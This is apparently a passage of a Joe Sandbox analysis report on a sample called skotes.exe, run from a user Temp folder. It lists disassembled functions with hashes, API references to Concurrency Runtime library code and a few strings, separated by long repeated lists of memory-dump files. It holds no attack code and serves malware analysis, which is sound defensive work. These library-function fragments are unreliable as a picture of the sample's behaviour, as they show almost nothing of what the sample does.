Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 6{$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-1176861032
Opcode ID: 9a42ad3a869bb7de57b73cf27fd34ac58c925adb8694ed584f9d2d47cf922b21
Instruction ID: a7ad2c90a717b05dc7c7eb0e795ef83513fea01e88930e2f12484c13f768653e
Opcode Fuzzy Hash: 9a42ad3a869bb7de57b73cf27fd34ac58c925adb8694ed584f9d2d47cf922b21
Instruction Fuzzy Hash: B7219D71604209AFAB34BE758C84FEB77ADEF403647204614F82996351EBA8EC1087A1

Function 007AAE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 007AAEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007AAF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 007AAF4E

Strings

pExecutionResource, xrefs: 007AAF07

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: c2a10eabdfc0876d7ddd434625db07947a056fab69e436c3fa71a598b0bb948d
Instruction ID: 824125647571bb127d4e16e2eaf7fd578027961243c435145079791aa2967e60
Opcode Fuzzy Hash: c2a10eabdfc0876d7ddd434625db07947a056fab69e436c3fa71a598b0bb948d
Instruction Fuzzy Hash: 8121A7B1641205EBCF18EF54C856BADB7B5BF88310F10402DF505AB282DBB8AE04CB95

Function 007A4EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A4F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 007A4F66

Strings

ppVirtualProcessorRoots, xrefs: 007A4F1C
count, xrefs: 007A4EBA

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: c9e8c3ab21990e3d8c07b78b5fbbf911312c6aa15f684d6e1c0e5180a45064ac
Instruction ID: 2435d7b70fd3f79248dbe165fb8558ce63d90eb46041c3e646cc3ceb3ca04021
Opcode Fuzzy Hash: c9e8c3ab21990e3d8c07b78b5fbbf911312c6aa15f684d6e1c0e5180a45064ac
Instruction Fuzzy Hash: 7821F535600115EFCF14EF98C895EAD77B5FF89310F00412AF5069B692DB7AAE01CB91

Function 007AB975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007ABA0E

Strings

combase.dll, xrefs: 007AB983, 007AB988, 007AB99D, 007AB9C8
RoUninitialize, xrefs: 007AB9C1
RoInitialize, xrefs: 007AB998

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: 6c111162fd543e964c0829c28c0276606e8089e01b1ff33cc557a783fabc3a3e
Instruction ID: c6036a887922fb174b3afec2b99ad29ec2a84d0bd6d560ba1e59b0c012674590
Opcode Fuzzy Hash: 6c111162fd543e964c0829c28c0276606e8089e01b1ff33cc557a783fabc3a3e
Instruction Fuzzy Hash: 0401F9B0692355E9D71877755C0DBAB369C9F42304F60592DE580EB282EF7DD80046A5

Function 007A6E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 007A6E73

Part of subcall function 007A4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 007A4E7F
Part of subcall function 007A4E6E: List.LIBCMT ref: 007A4E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A6E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007A6EAA

Strings

eventObject, xrefs: 007A6E7D

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: 6390ec6ffdd749e647e946e2bd3096ca16c903e80f8e1961d1b0c2bf6686204c
Instruction ID: a9158e912a29f253adaa663b15977e021b17bf2ecd1919abbc8f4b15a95c2a2b
Opcode Fuzzy Hash: 6390ec6ffdd749e647e946e2bd3096ca16c903e80f8e1961d1b0c2bf6686204c
Instruction Fuzzy Hash: 7611E575644204FBDB28FBA4CC4AFEE73786F41710F204215B505A61C1DB78AA04C675

Function 007AA0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 007AA102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 007AA126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007AA139

Strings

pScheduler, xrefs: 007AA131

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

